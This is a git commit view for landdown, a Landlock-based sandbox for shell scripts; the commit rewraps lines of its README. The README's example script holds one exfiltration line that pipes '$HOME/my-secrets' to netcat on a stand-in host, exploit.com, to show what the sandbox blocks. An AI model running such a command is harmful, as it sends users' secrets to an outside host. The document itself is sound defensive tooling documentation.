landdown
Simple Sandboxing for shell scripts.
git clone git://mccd.space/landdown
| Log | Files | Refs | README | LICENSE |
commit fb2e799fd8cf1ddfde9648657618b3434851d9a9 parent 5df15f1551789ac30fc2bfdf23bfb112a53c15d5 Author: Marc <marc@coquand.email> Date: Mon, 29 Jun 2026 15:00:37 +0200 README update Diffstat:
| M | README.md | | | 23 | +++++++++++++++++------ |
1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md @@ -1,6 +1,11 @@ # Landdown - Simple shell script sandbox -Landdown is an easy-to-use utility for Linux that allows you to sandbox shell scripts with [Landlock](https://landlock.io). Just like Landlock, Landdown "aims to protect you against the security impacts of bugs or unexpected/malicious behavior". To use, prepend your script with the landdown shebang and a ruleset, and then write your shell script like you would normally. For example: +Landdown is an easy-to-use utility for Linux that allows you to +sandbox shell scripts with [Landlock](https://landlock.io). Just like +Landlock, Landdown "aims to protect you against the security impacts +of bugs or unexpected/malicious behavior". To use, prepend your script +with the landdown shebang and a ruleset, and then write your shell +script like you would normally. For example: ```sh #!/usr/bin/env landdown @@ -13,7 +18,8 @@ echo "Hi" cat $HOME/my-secrets | nc exploit.com 1337 ``` -Landdown locks down file and network access of a script based on rules explicitly listed in the allowlist. +Landdown locks down file and network access of a script based on rules +explicitly listed in the allowlist. The syntax is: @@ -63,7 +69,8 @@ echo "Edit" > /tmp/some-file.txt Try removing `rwf /tmp/some-file.txt` and the script should fail. -Note: the file need to exist in order for landdown to work, run `touch /tmp/some-file.txt` to test. +Note: the file need to exist in order for landdown to work, run `touch +/tmp/some-file.txt` to test. ### Network access @@ -78,11 +85,13 @@ connect 443 curl https://www.google.com ``` -Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443` and it should fail. Network access needs to be explicitly set. +Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443` +and it should fail. Network access needs to be explicitly set. ## Patches & Contributions -Contributions are welcome. Please send them to my [public inbox](mailto:~marcc/public-inbox@lists.sr.ht) +Contributions are welcome. Please send them to my [public +inbox](mailto:~marcc/public-inbox@lists.sr.ht) ## See also @@ -96,4 +105,6 @@ Contributions are welcome. Please send them to my [public inbox](mailto:~marcc/p - **[firejail](https://github.com/netblue30/firejail/tree/HEAD/src/firejail)**(1) - **[landrun](https://github.com/Zouuup/landrun)**(1) -Landdown tries to be as friction-less and simple as possible, and specifically targets shell scripts rather than command line invocations. +Landdown tries to be as friction-less and simple as possible, and +specifically targets shell scripts rather than command line +invocations.